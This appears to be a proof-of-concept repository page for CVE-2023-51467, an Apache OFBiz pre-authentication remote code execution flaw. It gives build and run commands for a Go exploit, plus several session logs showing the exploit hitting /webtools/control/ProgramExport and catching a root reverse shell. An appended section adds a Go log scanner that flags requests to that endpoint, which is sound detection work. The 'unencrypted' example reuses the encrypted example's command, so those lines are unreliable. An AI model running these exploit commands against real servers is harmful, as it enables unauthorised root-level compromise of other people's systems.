
CVE-2023-51467 PoC — Apache OFBiz: Pre-authentication Remote Code Execution (RCE) vulnerability

Associated Vulnerability
Title: Apache OFBiz: Pre-authentication Remote Code Execution (RCE) vulnerability (CVE-2023-51467)
Description: The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code.

Description
A go-exploit for Apache OFBiz CVE-2023-51467

Readme
# Go-Exploit for CVE-2023-51467

This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (this requires that the Java runtime in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).

# Compiling

You can use the makefile to build a docker container:

```sh
make docker
```

Or, if you have a Go build environment ready to go, just use `make`:

```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go 
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```

## Example Usage

### Using Docker

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Encrypted Nashorn Reverse Shell

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```

### Unencrypted Reverse Shell

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```
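As an added defender-side example, not code from the exploit repository: a small Go scanner over web-server access-log lines that flags requests to the `/webtools/control/ProgramExport` controller entry, the URL the README's session output shows the exploit being thrown at. The log lines, client addresses and user agents are constructed samples; the matching is case-insensitive and ignores the query string and trailing slash so that trivial variations of the path are still caught.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Constructed sample access-log lines (combined log format); hosts, times and agents are made up.
var sampleLog = `10.9.49.131 - - [03/Jan/2024:16:55:21 -0500] "GET /webtools/control/main HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.9.49.131 - - [03/Jan/2024:16:55:21 -0500] "POST /webtools/control/ProgramExport/ HTTP/1.1" 200 233 "-" "Go-http-client/1.1"
10.9.49.50 - - [03/Jan/2024:16:56:02 -0500] "POST /webtools/control/programexport?USERNAME=x HTTP/1.1" 302 0 "-" "curl/8.0"
10.9.49.131 - - [03/Jan/2024:16:57:10 -0500] "GET /catalog/control/main HTTP/1.1" 200 9000 "-" "Mozilla/5.0"`

// Hit is one request to the ProgramExport controller entry.
type Hit struct {
	Src, Method, Path string
	Status            int
}
// lineRE pulls client IP, method, request path and status from a combined-format line.
var lineRE = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})`)

// FindProgramExportHits flags every request whose path is the OFBiz ProgramExport endpoint.
func FindProgramExportHits(log string) []Hit {
	var hits []Hit
	for _, line := range strings.Split(log, "\n") {
		m := lineRE.FindStringSubmatch(line)
		if m == nil {
			continue // not a parseable access-log line
		}
		path := strings.ToLower(m[3])
		if i := strings.Index(path, "?"); i >= 0 {
			path = path[:i] // drop the query string before comparing
		}
		if strings.TrimRight(path, "/") != "/webtools/control/programexport" {
			continue
		}
		status, _ := strconv.Atoi(m[4])
		hits = append(hits, Hit{Src: m[1], Method: m[2], Path: m[3], Status: status})
	}
	return hits
}

func main() {
	// A 200 on this endpoint from a client that never authenticated is the strongest signal.
	for _, h := range FindProgramExportHits(sampleLog) {
		fmt.Printf("ALERT src=%s %s %s status=%d\n", h.Src, h.Method, h.Path, h.Status)
	}
}
```

Run it over real access logs by replacing `sampleLog` with the file contents; pair any hit with the instance's reported version, since the tool's own output only says the target "might" be vulnerable.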
File Snapshot

[4.0K] /data/pocs/e41f30e1befdb5d2b2b54e1ee85547e21b0ece85
├── [6.7K] cve-2023-51467.go
├── [ 466] Dockerfile
├── [ 869] go.mod
├── [4.7K] go.sum
├── [ 11K] LICENSE
├── [2.1K] Makefile
└── [5.3K] README.md

0 directories, 7 files